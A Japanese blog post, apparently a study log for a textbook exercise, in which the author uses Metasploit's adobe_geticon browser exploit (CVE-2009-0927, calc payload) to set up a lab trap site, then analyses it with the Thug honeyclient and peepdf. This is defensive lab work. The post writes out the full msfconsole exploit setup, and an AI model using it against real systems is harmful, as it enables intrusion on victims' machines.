サイバーセキュリティモニタリング(ハニーポット編 1)

サイバーセキュリティモニタリング(攻撃と侵入編) - あしのあしあと」の続き。3 章の章末問題【1】をやる。今回も、本編の類題。リハビリにはうってつけ。「今度こそ余裕」と思っていた。確かに、本編のハンズオンは、うまくいった。しかし、章末問題が。。


ハニーポットは、「低対話型ハニークライアント」である Thug を使って構築する。
ごめんなさい。聞いたことすらなかったです。しかし、名前。。


まずは、(a) をやってみる。ワナのサイトは、Kali Linux の方で立ち上げる。
Metasploit で「adobe_geticon」を検索すると、2 件ヒットする。Name「exploit/windows/fileformat/adobe_geticon」は、pdf ファイルを作成するだけなので、違うなと。なので、Name「exploit/windows/browser/adobe_geticon」を対象にした。

$ msfconsole

search adobe_geticon
use exploit/windows/browser/adobe_geticon

show targets
set TARGET 0

show options
set SRVHOST 192.168.1.5
set URIPATH /adobe_geticon
set PAYLOAD windows/exec
set CMD calc

exploit

ワナできたよ。お次は、ハニークライアント。REMnuxThug が同梱されているので、これを使うよ。
そして、Windows XPIE 6.0 および Acrobat Reader 7.0 が入っているように見せかける。準備ができたので、満を持して、ワナを踏む。

$ thug.py -u winxpie60 -A 7.0.0 -F -Z http://192.168.1.5:8080/adobe_geticon
[2017-03-18 16:54:39] [window open redirection] about:blank -> http://192.168.1.5:8080/adobe_geticon
[2017-03-18 16:54:39] [HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Status: 200, Referer: None)
[2017-03-18 16:54:39] [HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Content-type: application/pdf, MD5: b25b5c32911445483cfb241607c171a6)
[2017-03-18 16:54:39] Thug analysis logs saved at /var/log/thug/logs/ae9cafb5c4b490545459fe2432366b5b/20170318165439

おぉ、PDF ファイルが取れ、ログも出力したみたいだ。ログを見てみると...

$ cd /var/log/thug/logs/ae9cafb5c4b490545459fe2432366b5b/20170318165439
$ cd analysis/json
$ less analysis.json
... snip ...
"behavior": [
    {
        "timestamp": "2017-03-18 16:54:39.675509", 
        "cve": "None", 
        "description": "[window open redirection] about:blank -> http://192.168.1.5:8080/adobe_geticon", 
        "method": "Dynamic Analysis"
    }, 
    {
        "timestamp": "2017-03-18 16:54:39.676161", 
        "cve": "None", 
        "description": "about:blank -- window open --> http://192.168.1.5:8080/adobe_geticon", 
        "method": "Dynamic Analysis"
    }, 
    {
        "timestamp": "2017-03-18 16:54:39.740234", 
        "cve": "None", 
        "description": "[HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Status: 200, Referer: None)", 
        "method": "Dynamic Analysis"
    }, 
    {
        "timestamp": "2017-03-18 16:54:39.741835", 
        "cve": "None", 
        "description": "[HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Content-type: application/pdf, MD5: b25b5c32911445483cfb241607c171a6)", 
        "method": "Dynamic Analysis"
    }
], 
... snip ...

あれ? CVE の番号が、わからない。。thug.py の引数を変えて、何度もやってみたけど、ダメ。またダメなの?


めげずに、先走って (b) をやってみる。peepdf を使って、先ほど取得した、悪性 PDF ファイルを、構造解析する。

$ peepdf -f -l b25b5c32911445483cfb241607c171a6

File: b25b5c32911445483cfb241607c171a6
MD5: b25b5c32911445483cfb241607c171a6
SHA1: 878df65ffa961351f275d1df044fbcd2851c4802
... snip ...
Version 0:
    Catalog: 1
    Info: No
    Objects (6): [1, 2, 3, 4, 5, 6]
        Errors (1): [6]
    Streams (1): [6]
        Encoded (1): [6]
    Objects with JS code (1): [6]
    Suspicious elements:
        /OpenAction: [1]
        /JS: [5]
        /JavaScript: [5]
        getIcon (CVE-2009-0927): [6]

6 番目のオブジェクトが、圧縮されたストリームオブジェクト。ここに、CVE-2009-0927 を悪用する JavaScript が含まれているっぽい。一応、ファイルに保存しておく。

$ peepdf -f -l -i b25b5c32911445483cfb241607c171a6

PPDF> object 6 > object6_file

心残りではあるが、ハマりそうなので、ひとまず 3 章の章末問題【1】は、これくらいにしておく。なんたって、時間が足りない。